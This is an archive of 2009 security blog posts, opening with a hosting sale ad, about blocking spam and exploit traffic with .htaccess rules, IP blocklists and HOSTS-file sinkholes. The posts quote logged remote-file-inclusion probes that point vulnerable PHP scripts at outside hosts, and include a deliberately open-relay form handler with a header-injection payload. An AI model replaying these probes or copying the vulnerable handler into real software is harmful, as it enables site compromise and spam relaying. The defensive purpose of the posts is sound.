This applies to ALL Accounts and ALL Term Lengths. If you are one of the lucky people to get in on the 80% off discount, you will have the opportunity to receive up to 80% off of up to 3 years worth of Hosting! That would come out to $35.64 for 3 FULL YEARS!

The Black Friday discounts include Shared Hosting, Reseller Hosting, VPS Hosting AND even Dedicated Servers! Never before has HostGator allowed such a promotion on EVERYTHING including reseller, VPS and dedicated servers AND ALL Term Lengths.

Note: The discount will apply to your first invoice (the first term length you sign up for, whether that is 1 month or 3 years). You may as well sign up for three full years at these prices.

Get HostGator Web Hosting Now! Comes with 24/7 Support via Phone, Live Chat, and Email and a 30 day money back guarantee. Lease terms range from 1 month, up to 3 years.

Remember: all of these discounts end at 11:59 PM, CST! Don't let this one slip past you. Act Now!


November 19, 2009

Block trackback spammer operating on Ubiquity Server Solutions

For the past few days I have discovered that a script, or person operating a server farm, at Ubiquity Server Solutions, is attempting to post spam trackbacks to my blog. I don't even allow trackbacks on my blog, for this very reason, yet, this spamming idiot keeps blasting away with his script, ignoring a constant flow of Server 403 (Forbidden) responses. The page that the spammer is trying to POST to is no longer on the blog database, having been deleted in the spring of 2006! So, he is wasting his time and amusing me as I look at all the IP addresses I can add to my Exploited Servers Blocklist.

In fact, I have discovered that this blog trackback spammer is using a server farm assigned to Ubiquity Server Solutions, in Seattle, Washington, USA. Their full assigned CIDR is 64.120.4.0/22, covering IPs ranging from 64.120.4.0 through 64.120.7.255. However, to be fair to this clueless hosting service, the spammer is rotating through a group of servers with IP addresses only in the range of 64.120.5.0 - 64.120.5.255. To minimize possible collateral damage to innocent hosting customers, I am only blocking the narrow range encompassed by the CIDR 64.120.5.0/24.

UPDATE
November 20, 2009

Ubiquity Servers is now hitting MovableType blogs with trackback spam exploit attempts from a different CIDR: 174.34.144.0/23. I have updated the evidence and blocklist rules below to include this new CIDR.

The evidence:

174.34.145.115 - - [19/Nov/2009:12:59:57 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
174.34.145.117 - - [19/Nov/2009:15:16:17 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

64.120.5.197 - - [18/Nov/2009:07:07:08 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.241 - - [18/Nov/2009:07:12:57 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.246 - - [18/Nov/2009:07:32:26 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.254 - - [18/Nov/2009:07:49:48 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.236 - - [18/Nov/2009:08:22:27 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.196 - - [18/Nov/2009:08:30:16 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.225 - - [18/Nov/2009:08:49:54 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

Enough already! You will notice that the spammer is only attempting to POST to two items. One is identified as blog entry number 18, which dates back to May of 2006 and was deleted from my blog in early 2007. The other target of this hapless spammer is an article I wrote about "Stupid Blog Trackback Spammers" not understanding a 403 Forbidden response, when they try to post trackback comments to a blog that has all trackbacks and comments disabled! There are no trackbacks or comments allowed on my blog! Spammers cannot POST anything!

I find this amusing, but others who do allow trackbacks or comments may not be so amused by this a-hole, whom I previously may have traced to Romania. If your website is hosted on an Apache web server, you can serve him a steady diet of Server 403 Forbidden responses by blocking his IP CIDR and his user agent in your public web root .htaccess file, as demonstrated below.



# Block the two CIDRs the spammer has been seen rotating through
# (Apache 2.2 mod_access syntax; Apache 2.4 accepts it via mod_access_compat)
<Files *>
order deny,allow
deny from 64.120.5.0/24
deny from 174.34.144.0/23
</Files>

# Answer 403 Forbidden to any request whose user agent is exactly "tbr/0.1.0"
Options +FollowSymLinks
RewriteEngine On
RewriteOptions inherit
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} ^tbr/0\.1\.0$
RewriteRule .* - [F]



You should determine if legitimate visitors to your blogs are using the tbr/0.1.0 user agent. If so, don't block it. In all likelihood, only spammers use that tool with that version number.
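The CIDR test and the user-agent match above can be run over an access log before the rules go into .htaccess, to see exactly which requests they would catch. The following is an added example written for this page, not code from the original post or from MovableType: it parses combined-format log lines like the evidence quoted above, flags hits from the two blocked CIDRs, the "tbr/0.1.0" user agent and POSTs to the trackback CGI, and renders the matching "deny from" block. The CIDRs, the user agent and the quoted log lines are taken from the post; the function names and the one ordinary visitor line are this example's own.

```python
"""Flag trackback-spam requests in Apache combined-format access log lines.

Added example, not code from the original post or from MovableType. The CIDRs,
user agent and quoted log lines come from the post; the function names and the
extra benign line are this example's own.
"""
import ipaddress
import re
from collections import Counter

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

BLOCKED_CIDRS = [ipaddress.ip_network(c) for c in ("64.120.5.0/24", "174.34.144.0/23")]
BAD_AGENTS = {"tbr/0.1.0"}   # exact match only, per the caveat above about legitimate visitors


def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def in_blocked_range(ip, networks=BLOCKED_CIDRS):
    """True when the address falls inside any blocked network (the CIDR test the post describes)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def classify(rec):
    """Reasons a request would be refused: 'cidr', 'agent' and/or 'trackback'. Empty set = clean."""
    reasons = set()
    if in_blocked_range(rec["ip"]):
        reasons.add("cidr")
    if rec["agent"] in BAD_AGENTS:
        reasons.add("agent")
    # POST to the MovableType trackback CGI on a blog that has trackbacks switched off
    if rec["method"] == "POST" and "/mt-tb.cgi" in rec["path"]:
        reasons.add("trackback")
    return reasons


def analyze(lines):
    """Flagged requests per source IP: {ip: Counter(reason -> hits)}. Unparseable lines are skipped."""
    hits = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.setdefault(rec["ip"], Counter()).update(reasons)
    return hits


def htaccess_rules(networks=BLOCKED_CIDRS):
    """Render the Apache 2.2-style <Files *> block with one "deny from" line per network."""
    body = "\n".join(f"deny from {net}" for net in networks)
    return f"<Files *>\norder deny,allow\n{body}\n</Files>\n"


# Three lines quoted in the post above, plus one ordinary visitor line constructed for contrast.
SAMPLE_LOG = [
    '174.34.145.115 - - [19/Nov/2009:12:59:57 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"',
    '64.120.5.241 - - [18/Nov/2009:07:12:57 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"',
    '64.120.5.246 - - [18/Nov/2009:07:32:26 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"',
    '198.51.100.7 - - [18/Nov/2009:07:40:00 -0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.5"',
]

if __name__ == "__main__":
    for ip, reasons in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, dict(reasons))
    print(htaccess_rules())
```

Run it as a script to see the per-IP reasons and the rendered rules; pass the lines of a real access log to analyze() to get the same report for your own site. The user-agent check is an exact string comparison, so a visitor whose browser merely mentions "tbr" somewhere in its identification is not flagged.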

Details about the .htaccess file are found in my extended comments.

Continue reading "Block trackback spammer operating on Ubiquity Server Solutions" »


November 14, 2009

Block server exploit attacks coming from ThePlanet IP space

When it comes to hackers and cyber criminals using leased, co-located, or hijacked web servers to attack other web servers, one of the top culprits I see in my daily access logs is traceable to ThePlanet.com, based in Dallas, Texas. More server attacks originate from their IP addresses during any given week than from anywhere else. This has been the case for at least three years in a row.

When I say "server attacks" I am referring to attempts to hack a web server, or website, by sending it requests designed to exploit unpatched versions of software commonly used by website owners. Most attempts try to make a PHP script that is known to be exploitable fetch and run a hostile file from another server, by passing that file's URL in a script parameter which the vulnerable code hands straight to include(). These are known as PHP injection or remote file inclusion (RFI) exploits. Of those targeted scripts, the one that I see almost every day, in my access logs, is the Coppermine Gallery script. Hardly a day goes by that some script kiddie, or hacker, or bot tries to inject hostile files into my server via Coppermine exploits, as demonstrated in the following actual log entry:


70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

We can use DNSStuff or DomainTools to run a WhoIs lookup on that IP address...

WHOIS - 70.85.136.34
Location: United States [City: Dallas, Texas]
OrgName: ThePlanet.com Internet Services, Inc.
NetRange: 70.84.0.0 - 70.87.255.255
CIDR: 70.84.0.0/14

Definition of CIDR
In the above results, the last item shown is the CIDR of the entity in question. CIDR stands for "Classless Inter-Domain Routing." It is designated by appending a forward slash and a prefix length to a starting IP address, to designate an entire range of IPs assigned to that entity; the prefix length is the number of leading bits shared by every address in the range. In this case, 70.84.0.0/14 covers all IPs from 70.84.0.0 through 70.87.255.255.

The CIDR covering ThePlanet.com is shown to be 70.84.0.0/14, but they have other assigned CIDRs that are used by hackers and spammers. All pertinent CIDRs that I have discovered to this date for ThePlanet.com are listed further down in this article, in "deny from" rules, which are referred to as a "blocklist." I have also thrown in IPs belonging to Everyone's Internet and Rackspace, both favorites of spammers and hackers. Any IP address that is covered by one of the CIDRs in the blocklist will get a server 403 Forbidden response, no matter what page they try to view on a website that employs these rules.

Furthermore, I have included a ".htaccess" "Mod_Rewrite" rule to block the exact user agent "Mozilla/5.0", meaning the bare string with nothing after it. No mainstream browser sends that on its own, but exploit scripts commonly do. The rule must match the whole string and nothing more, because every modern browser's user agent begins with "Mozilla/5.0" and a prefix match would lock out your real visitors. Read on and learn how to protect your Apache web server, or Apache hosted websites, from exploit attacks coming from ThePlanet and the like, or from tools announcing themselves as a bare Mozilla/5.0.

Continue reading "Block server exploit attacks coming from ThePlanet IP space" »


July 18, 2009

Protect your Apache hosted website from Chinese exploit attacks

While reading my raw access logs I noticed that a lot of the recent exploit attacks hitting my website are coming from China and Korea. I can't say with certainty that the attacks originated in those countries, because they could be coming from compromised servers. Do you care whether an attack originated at the server that is attacking yours? Hell no! If some black hat hacker is commandeering a hundred thousand Chinese servers and using them to attack my servers I block the Chinese IP addresses since they are attacking me.

Here is a typical, recent exploit attempt, coming from a server in China. I have changed the destination URL to example.com for your safety.

218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

If I was running a vulnerable version of the targeted "Coppermine" software, that request would have made theme.php fetch copyright.txt from the remote server and execute it as PHP, returning a server 200 Success instead of a 403 Forbidden response. This would have led to the exploitation of my website, and hidden iframes would redirect my visitors to hostile destinations. I won't willingly allow that to happen and neither should other webmasters.

So, you ask, how do I block these Chinese servers from attacking my websites? If your websites are hosted on Apache web servers I can offer you two effective means of blocking those exploit probes. The details follow.

Continue reading "Protect your Apache hosted website from Chinese exploit attacks" »


May 22, 2009

Vulnerabilities roundup for May 18 - 22, 2009

Takeaway

This week has been a headache for the major web software vendors, especially Red Hat Linux and other distributions. Windows users are being targeted by highly critical vulnerabilities in Winamp and Quicktime. Mac users are affected by a flaw in Calendar Objects for Java. So far, between May 18 and 22 there have been at least 85 vulnerability advisories reported by the security investigators at Secunia, 17 of which are rated as "highly critical." I counted at least 7 SQL flaws that can be or are being exploited to inject hostile redirection codes into websites.

Windows Vulnerabilities

On 5/18/09, Secunia reported an unpatched flaw in Winamp 5.x that can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused by the use of vulnerable libsndfile code. Successful exploitation may allow execution of arbitrary code. The vulnerability is confirmed in version 5.552, but other versions may also be affected. Since this vulnerability is currently unpatched, the best advice is to not open untrusted files in Winamp.

A highly critical vulnerability was reported in Apple QuickTime 7.x, on 5/22/09, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an error in the processing of "0x77" tags within PICT images, which can be exploited to cause a heap-based buffer overflow when the user opens a specially crafted PICT image or visits a malicious web site. This flaw is new and unpatched, so you are advised to not browse untrusted web sites, or open PICT files from untrusted sources.

Read about the vulnerabilities affecting other operating systems and software in my extended comments.

Continue reading "Vulnerabilities roundup for May 18 - 22, 2009" »


May 15, 2009

Securing FormMail scripts against spambots

Takeaway

This is a technical article about securing a Perl "FormMail" script against spammers who attempt to hijack these scripts for use as spam relays. For those not in the know, FormMail, written in the "Perl" scripting language, is one of the original mailer scripts freely available for general use on websites. It is used by millions of webmasters to send email from a web page form. However, unbeknownst to many webmasters, older versions of FormMail are totally insecure and can be exploited as spam relays.

History of FormMail

The original version of FormMail was written in 1995 by Matt Wright and was made available for free on his website: Matt's Script Archive. Unfortunately, the early versions of his FormMail script were very insecure and easily turned into spam relays. This fact was seized upon in 2002 by spammers who used bots to scour websites in search of these exploitable scripts, by name or variations thereof. In response, on April 19, 2002, Matt rewrote his FormMail script to secure it better and released it as version 1.91. This was to become the final version of Matt's FormMail. It remains mostly insecure to this day, yet is in use by website owners around the World who haven't learned about the exploits targeting FormMail.

Several years ago I wrote an in depth web article describing the vulnerabilities in Matt's FormMail, partially titled: FormMail Security Vulnerabilities and Solutions, in which I also recommended a drop-in secure replacement script known as NMS FormMail, which was developed by a group calling themselves the London Perl Mongers. My article is still a valuable resource and will bring most webmasters up to speed on what they need to do to protect their websites from FormMail exploiters. Following my recommendations will certainly help to secure any FormMail scripts you may be using. It will also protect your email address(es) from being harvested, because NMS FormMail lets the form refer to recipients by alias numbers instead of plain text addresses. But, there's more you can do that wasn't covered in my original article.
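To make the relay problem and the alias fix concrete, here is an added example written in Python rather than Perl; it is not the code of Matt's FormMail or of NMS FormMail. The weak handler trusts the form's own "recipient" field and copies header fields verbatim, so a spammer can address mail to anyone and inject extra headers by putting a CRLF inside a field. The hardened handler resolves recipients only through a server-side alias table, the numbered-alias idea from NMS FormMail, refuses any header field containing a line break, and keeps the visitor's address in Reply-To rather than From. The field names, the alias table and the addresses are this example's own assumptions, and nothing is actually sent.

```python
"""A FormMail-style form handler: the open-relay version beside a hardened one.

Added example, not the code of Matt's FormMail or NMS FormMail. Field names,
the alias table and the addresses are assumptions made for the example; the
functions return the message they would hand to the mail server and send nothing.
"""
import re
from email.message import EmailMessage

RECIPIENT_ALIASES = {"1": "webmaster@example.org", "2": "sales@example.org"}  # the form sends a number only
HEADER_FIELDS = ("email", "subject")           # form fields that end up in message headers
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
SENDER = "formmail@example.org"                # fixed local envelope sender


class FormError(ValueError):
    """Raised when a submission must be refused."""


def vulnerable_build(form):
    """The old behaviour: any recipient at all, and a CRLF in a field becomes a new header line."""
    headers = (
        f"To: {form.get('recipient', '')}\r\n"
        f"From: {form.get('email', '')}\r\n"
        f"Subject: {form.get('subject', '')}\r\n"
    )
    return headers + "\r\n" + form.get("message", "")


def hardened_build(form, aliases=RECIPIENT_ALIASES):
    """Resolve the recipient through the alias table and refuse header injection."""
    to = aliases.get(str(form.get("recipient", "")))
    if to is None:
        raise FormError("recipient is not a configured alias")
    for field in HEADER_FIELDS:
        value = form.get(field, "")
        if "\r" in value or "\n" in value:
            raise FormError(f"line break in header field {field!r}")
    msg = EmailMessage()
    msg["To"] = to
    msg["From"] = SENDER
    visitor = form.get("email", "").strip()
    if EMAIL_RE.match(visitor):
        msg["Reply-To"] = visitor              # the only place the visitor's address goes
    msg["Subject"] = (form.get("subject") or "Website form submission")[:200]
    msg.set_content(form.get("message", ""))
    return msg


def handle(form, aliases=RECIPIENT_ALIASES):
    """(True, EmailMessage) on success, (False, reason) on refusal, so refusals can be logged."""
    try:
        return True, hardened_build(form, aliases)
    except FormError as err:
        return False, str(err)


# Constructed submissions: a relay attempt with an injected Bcc header, and a genuine one.
SPAM_FORM = {
    "recipient": "victim@example.net",
    "email": "spammer@example.net",
    "subject": "hello\r\nBcc: a@example.net, b@example.net",
    "message": "buy now",
}
GOOD_FORM = {"recipient": "1", "email": "visitor@example.com", "subject": "Question", "message": "Hello"}

if __name__ == "__main__":
    print(vulnerable_build(SPAM_FORM))     # the injected Bcc line lands in the header block
    print(handle(SPAM_FORM))                # refused: recipient is not a configured alias
    print(handle(GOOD_FORM)[1]["To"])      # webmaster@example.org
```

Renaming the script, as the next section discusses, hides it from bots; the alias table is what stops a human spammer who has read your form's HTML, because there is no longer any field whose value names a mailbox.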

Securing FormMail - 101

One of my recommendations was renaming your FormMail script to something other than its default spelling: formmail.pl. While this makes it a little harder to locate the script for hostile bots it is useless at protecting it against human spammers. All they need to do is to read the source code of your contact, or feedback pages to get the name of the script that processes your forms and mails comments to you. Then they can go after that script by its new name to try to exploit it for use as a spam relay. If it really is an insecure version of Matt's FormMail it will be used as a spam relay! If you are running your website on an Apache web server, as most of us are, there are special codes, called Mod_Rewrite Directives, that can be applied to a particular server file named .htaccess to completely hide the name of the renamed script, protecting it from being used as a spam relay. If you are allowed to add these directives you can make your FormMail script invisible to spammers.

Read the rest of the details in my extended comments.

Continue reading "Securing FormMail scripts against spambots" »


May 1, 2009

Block Ukrainian Malware Server on Eurohost

Yesterday, April 30, 2009, when investigating a problem with an associate's websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in the Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.

The hostile iframe code was injected into the home pages of two related websites by exploiting vulnerabilities in a PHP script used by the webmaster of those websites. The server dispensing the exploits is located at 91.212.65.138, which coincides with the Eurohost home page. The CIDR assigned to Eurohost is 91.212.65.0/24 and you should block access to it in your firewall IP blocking rules. The redirector hostname, tojandglow.com, can additionally be sinkholed in your Windows HOSTS file, which works on names but not on IP addresses or ranges. Examples of how to do both are found below.

Any website that is running php or cgi scripts is in danger of becoming an inadvertent carrier of the redirection iframe that leads your innocent visitors to servers that are rigged to exploit a variety of exploitable vulnerabilities in their browsers, or browser add-ons, plug-ins, or helper objects. Some of the most frequently exploited applications are Internet Explorer (any version prior to 8.0), Adobe Flash, Adobe Reader and Apple Quicktime. Other exploited programs include Apple Safari, Google Chrome and occasionally, Mozilla Firefox. On rare occasions the Opera browser and the Java plug-in are vulnerable to targeted attacks. Firefox and Opera browsers are usually updated very quickly after a vulnerability is reported to their maintainers. Plug-ins usually take longer to update because they have to interact with so many other items and applications.

Webmasters and server administrators, you are responsible for keeping up to date with patches released by software authors, for any applications or scripts that you choose to run on your websites. Information to help you protect your websites and servers from getting exploited by hostile injection probes is in my extended comments.

Individuals browsing the Internet are the real targets of all of these injection attacks. This includes everybody reading this article. You and I have to constantly remain vigilant about threats to our computers' security. New exploits are found every month and are often released in the wild before software authors can respond with patched versions. Those are called zero day exploits. There are several ways to protect your computers from these exploits, including, but not limited to keeping up to date with all Windows, Mac or Linux updates and patches, and patches for commonly exploited third party browser add-ons, like Flash players, PDF Readers, Quicktime and Java plug-ins. Your next line of defense is a combination of security programs encompassing a 2-way firewall, anti-virus and anti-spyware and web threat protection that blocks hostile web pages. Or, you can install one top-notch security suite, like Trend Micro Internet Security and have all these protections and more in just one regularly updated package. There are links to reputable security products in the right sidebar on all of my blog pages.

Windows users have an additional means of protecting their PCs from visiting hostile websites. There is a special file, normally found in C:\Windows\System32\drivers\etc\, with the unusual file name: HOSTS. Although it has no file extension it can be opened and edited using the built-in Windows Notepad. The HOSTS file takes input in the form of an IP address followed by one or more hostnames (not full URLs), separated by a tab or multiple spaces. To protect your computer from being redirected to the hostile tojandglow website, open your HOSTS file and edit it using these steps.


  1. Using Start > (My) Computer, double-click on the C drive icon, then navigate to your Windows\System32\drivers\etc\ folder.

  2. Inside the "etc" folder you should see a file named "Hosts". You may have to unhide system files before this file can be seen. See my extended comments for details on how to do this.

  3. Right-click on the file named HOSTS and choose (left click) Properties

  4. Find the attributes section starting with "READ-ONLY" and uncheck it if it was checked

  5. Click Apply and OK to close the Properties window.

  6. Right-click on HOSTS while holding down the Shift key and select "Open With"

  7. Scroll through the programs list until you find "Notepad" and double-click on it

  8. If Notepad isn't listed you will have to use the browse button to navigate to the Windows folder, where Notepad.exe is located.

  9. With HOSTS open for editing go to the last line in the file and hit ENTER

  10. Add this line, with a tab after 127.0.0.1:

    • 127.0.0.1       tojandglow.com

  Do not add lines for 91.212.65.138 or 91.212.65.0/24. The HOSTS file only overrides hostname lookups; an entry with a bare IP address or a CIDR in the name column is ignored by Windows and blocks nothing. Block the 91.212.65.0/24 range in your firewall rules instead.


  11. Click File > Save and in the File Type selection, choose All Files and save it as HOSTS, without an extension.

  12. Windows may decide to add a .txt extension anyway. If it does, allow this, then right-click on the saved file and delete the .txt extension. Answer the challenge about changing file extensions.


Reboot your computer to make this protection take effect. From that point on any script that tries to redirect you to any of the web addresses listed in the HOSTS file will instead be looped right back to your own computer, commonly referred to as 127.0.0.1, or Local Machine. The injected iframe would display a "page cannot be found" error if it was visible (it isn't; it's only 1x1 pixel!). Do the same anytime a new hostile website or ip address is published.

BTW: If you see any 127.0.0.1 entries referring to microsoft.com in your HOSTS file, remove them! Malware put them there to prevent you from getting Windows Updates or Microsoft security downloads. Ditto for any recognizable security vendors' websites.
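The following is an added example, not code from the post, that carries out the HOSTS edit above as a script and adds the two checks a practitioner would want. A HOSTS file only overrides name resolution, so it can sinkhole tojandglow.com but cannot block the bare address 91.212.65.138 or the range 91.212.65.0/24; those belong in a firewall rule, and the code refuses them rather than writing lines Windows would ignore. It also lists any existing entries that redirect Microsoft update or security-vendor domains, the malware trick the note just above warns about. The protected-domain list, the sample file contents and the function names are this example's own; the path is the real Windows location, C:\Windows\System32\drivers\etc\hosts.

```python
"""Sinkhole malware hostnames in a HOSTS file, and spot entries planted by malware.

Added example, not code from the post. The protected-domain list, the sample
file and the function names are this example's own assumptions.
"""
import ipaddress
import re
import shutil
from pathlib import Path

WINDOWS_HOSTS = Path(r"C:\Windows\System32\drivers\etc\hosts")   # the real Windows location
SINKHOLE = "127.0.0.1"
HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I)
# Domains that only malware would ever redirect on an end-user PC (assumed list).
PROTECTED_SUFFIXES = ("microsoft.com", "windowsupdate.com", "trendmicro.com", "symantec.com", "mcafee.com")


def parse_hosts(text):
    """Yield (ip, [hostnames]) for each active line; comments and blank lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        yield ip, names


def validate_sinkhole_target(name):
    """Return the normalised hostname, or raise ValueError for anything HOSTS cannot block."""
    try:
        ipaddress.ip_network(name, strict=False)
    except ValueError:
        pass
    else:
        raise ValueError(f"{name!r} is an address or range: block it in the firewall, not in HOSTS")
    if not HOSTNAME_RE.match(name):
        raise ValueError(f"{name!r} is not a valid hostname")
    return name.lower()


def sinkholeable(name):
    """True when the name can usefully go into HOSTS."""
    try:
        validate_sinkhole_target(name)
    except ValueError:
        return False
    return True


def add_sinkhole_entries(text, names, sink=SINKHOLE):
    """Return the file text with one sink line per hostname not already present (idempotent)."""
    present = {n.lower() for _, ns in parse_hosts(text) for n in ns}
    wanted = dict.fromkeys(validate_sinkhole_target(n) for n in names)   # de-duplicate, keep order
    lines = [f"{sink}\t{n}" for n in wanted if n not in present]
    if not lines:
        return text
    body = text if (text == "" or text.endswith("\n")) else text + "\n"
    return body + "\n".join(lines) + "\n"


def find_hijacked(text, protected=PROTECTED_SUFFIXES):
    """[(ip, hostname), ...] for entries that redirect update or security domains anywhere at all."""
    hits = []
    for ip, names in parse_hosts(text):
        for n in names:
            host = n.lower()
            if any(host == s or host.endswith("." + s) for s in protected):
                hits.append((ip, n))
    return hits


def write_hosts(text, path=WINDOWS_HOSTS):
    """Write the file after keeping a .bak copy; on Windows this needs an administrator prompt."""
    path = Path(path)
    if path.exists():
        shutil.copy2(path, path.with_name(path.name + ".bak"))
    path.write_text(text, encoding="utf-8")


# Constructed sample file, not from any real machine: one planted entry blocking Windows Update.
SAMPLE_HOSTS = """# constructed sample
127.0.0.1       localhost
127.0.0.1       update.microsoft.com   # planted by malware
"""

if __name__ == "__main__":
    print("hijacked:", find_hijacked(SAMPLE_HOSTS))
    print(add_sinkhole_entries(SAMPLE_HOSTS, ["tojandglow.com"]))
    for bad in ("91.212.65.138", "91.212.65.0/24"):
        print(bad, "sinkholeable:", sinkholeable(bad))
```

Run it as a script to see the checks against the constructed sample; to edit the real file, pass the result of add_sinkhole_entries() to write_hosts() from an administrator command prompt, which keeps a .bak copy of the previous file first. Because Windows caches resolver results, running ipconfig /flushdns afterwards makes the change take effect without a reboot.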

Continue reading "Block Ukrainian Malware Server on Eurohost" »


April 14, 2009

Russian Server sending exploit codes. Block 77.221.128.0/19 now!

Many of my regular visitors are aware that I maintain and publish various IP address blocklists, used to protect websites and web servers from nefarious activities by scammers, spammers and exploiters. Today, my website came under attack from a Russian Server, located in Saint Petersburg, Russia. The attacks were server exploit attempts, using various Query strings and http redirects. All were blocked by my security measures, but there were so many attempts in a short period of time that I feel that I should spread the word to other webmasters, before it is too late.

First off, server exploit attempts are nothing new. They happen every day and are easily seen if you read your website's raw access logs or stats. Most exploit attempts are fast in/out probes, usually coming from rotating IP addresses, and only a few at a time. But, the attack I logged this morning was different than the usual model. In a 26 minute period I received 69 exploit probes from the same IP address. I ran a Whois lookup on the IP 77.221.130.5 and found that it is assigned to Server 005 on infobox.ru, in Saint Petersburg, Russia. This is a virtual hosting and colocation data center, whose assigned address range is designated by the network CIDR 77.221.128.0/19, which spans 77.221.128.0 through 77.221.159.255.

Security-minded webmasters are interested in blocking offending IP addresses and the CIDRs that encompass exploited servers. Most folks running websites are hosted on Apache web servers and are using shared hosting accounts, where they can only use .htaccess file "directives" to block unwanted Internet traffic. Some web hosts may allow only "Mod_Access" directives in user defined .htaccess files. Here is a Mod_Access rule you can add to your .htaccess file to block the offending Russian data center mentioned above:

<Files *>
order deny,allow
deny from 77.221.128.0/19
</Files>

In the above .htaccess directive all IP addresses are permitted access to all files (Files *), except for those IPs included within the CIDR 77.221.128.0/19. This is due to the "order" statement (order deny,allow), which makes Apache evaluate the "deny from" rules first and any "allow from" rules after them, with the later match winning; since nothing is explicitly allowed here, anything not matched by a "deny from" rule is allowed by default. One caveat: this is the mod_access syntax of Apache 2.2 and earlier. Apache 2.4 still accepts it, but only through the mod_access_compat module; its native equivalent is "Require all granted" followed by "Require not ip 77.221.128.0/19" inside a <RequireAll> block.

I mentioned in the opening paragraph that I publish various IP blocklists (a.k.a. blacklists). The list that blocks the source of this exploit is called the Russian Blocklist, which includes numerous IP address ranges in Russia, Ukraine, Turkey and several other former Soviet Union countries. These lists are available in two formats each. The most commonly used format is my .htaccess blocklists and the lesser used type is my iptables blocklists.

Currently, there are four separate blocklists per format. They are the "Chinese" (and Indo-China), "Exploited Servers" (+ proxies), "Nigerian" (and African) and "Russian" (+ Turkey and former Soviet Union) Blocklists. If you use a shared web hosting account you will only be able to use the .htaccess format. If you have a VPS or fully dedicated server you can probably use the iptables blocklists, which require "root" access to the OS. The iptables blocklists deny all access to a server and every service on it, including email and ftp servers. A .htaccess blocklist can only deny access to http and https traffic. Either type will block the exploit probes listed in my extended comments. The landing pages explain how to use the directives contained in each blocklist.

All of my blocklists are currently free for the taking, but I do appreciate donations if you benefit from my work. You will find PayPal Donate buttons on each blocklist page.

Continue reading "Russian Server sending exploit codes. Block 77.221.128.0/19 now!" »


February 1, 2009

Block server script injection exploits targeting your websites

Server exploits abound!

Enough is enough already! It's bad enough that I have to fend off the occasional exploit attempt against my main website, but 24 in one day, from the same IP address is something I can't ignore, and neither should anybody else who maintains a website. That IP address is 212.241.182.240, which is a dedicated server that belongs to Pipex Dedicated Hosting (and associates), in Great Britain (See Whois report). This is an exploited server and it is hostile to other servers and websites!

Here is a sample of just one of the many attacks launched by this server, against mine (I deactivated the hyperlink to the hostile script, substituting an * for a t):

212.241.182.240 - - [01/Feb/2009:02:44:23 -0800] "GET /?sIncPath=ht*p://kadin.or.id/mail/id1.txt?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

What's this all about, you ask? It's about somebody who is leasing a dedicated server and either knowingly or unknowingly using it to blast out hostile exploitation scripts against other servers. This probe is trying to make a script on my website fetch and execute the remote file id1.txt, by passing its URL in a parameter (sIncPath) that a vulnerable script would hand straight to include(); it didn't happen here (see the 403 response). Normally I wouldn't even assume that the people leasing the server had any knowledge of such goings on, but this time something is different. In just about every other instance of script injection attempts, when I trace the IP to a server and try to access it, I usually see one of the following responses:

  1. A website's home page (index.html, index.php, etc.)
  2. A "Welcome to Apache" screen, for a new website on an Apache server
